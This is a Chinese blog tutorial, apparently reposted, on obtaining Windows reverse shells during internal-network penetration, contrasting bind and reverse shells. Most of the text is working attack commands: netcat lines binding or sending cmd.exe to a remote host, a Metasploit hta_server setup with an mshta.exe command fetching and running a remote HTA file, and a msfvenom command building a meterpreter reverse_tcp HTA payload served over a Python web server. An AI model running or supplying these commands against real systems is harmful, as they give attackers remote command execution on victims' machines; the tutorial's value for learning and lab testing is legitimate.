当前位置:   article > 正文

内网渗透之Windows反弹shell(一)_windows命令行反弹shell

windows命令行反弹shell

前言

作者简介:不知名白帽,网络安全学习者。

博客主页:https://blog.csdn.net/m0_63127854?type=blog

内网渗透专栏:https://blog.csdn.net/m0_63127854/category_11885934.html

网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan

目录

反向shell简介

01什么是正向shell

02什么是反向shell

Windows反弹shell

01NC正向shell

01NC反向shell

02mshta.exe

通过Metasoloit的HTA Web Server模块发起HTA攻击

通过msfvenom生成恶意hta文件

内网渗透之Windows反弹shell(二)_不知名白帽的博客-CSDN博客


反向shell简介

01什么是正向shell

正向shell:控制端主动发起亲贵去连接被控制端·中间网络链路不存在阻碍

02什么是反向shell

反向shell(反弹shell):被控端主动发起请求去连接控制端·通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接受发过来的数据包。

Windows反弹shell

01NC正向shell

被控端:

nc -lvvp 6666 -e cmd.exe

控制端:

nc 192.168.0.105 6666

原理:

被控端将cmd.exe重定向到本地的6666端口·控制端主动连接被控端的6666端口·即可获得shell

01NC反向shell

控制端:

nc -lvvp 6666

被控端:

nc -e cmd.exe 192.168.0.104 6666

再查看控制端

原理:

被控端将cmd.exe重定向到控制端6666端口·控制端只需要监听本地的6666端口·即可获得shell

02mshta.exe

mshta.exe是用于负责解释运行HTA文件的Windows OS实用程序·可以运行javascript或VBScript的HTML文件

通过Metasoloit的HTA Web Server模块发起HTA攻击

use exploit/windows/misc/hta_server

set srvhost 192.168.0.104

exploit -j

mshta.exe http://192.168.0.104:8080/SxUxU5AvkuW2LCX.hta

反弹成功

通过msfvenom生成恶意hta文件

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 -f hta-psh -o 222.hta

开启监听

handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.0.104 -P 4444

开启一个http服务,用于被控制端下载执行hta文件

python3 -m http.server

  

被控端执行

查看http服务

反弹成功

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/知新_RL/article/detail/152831
推荐阅读
相关标签
  

闽ICP备14008679号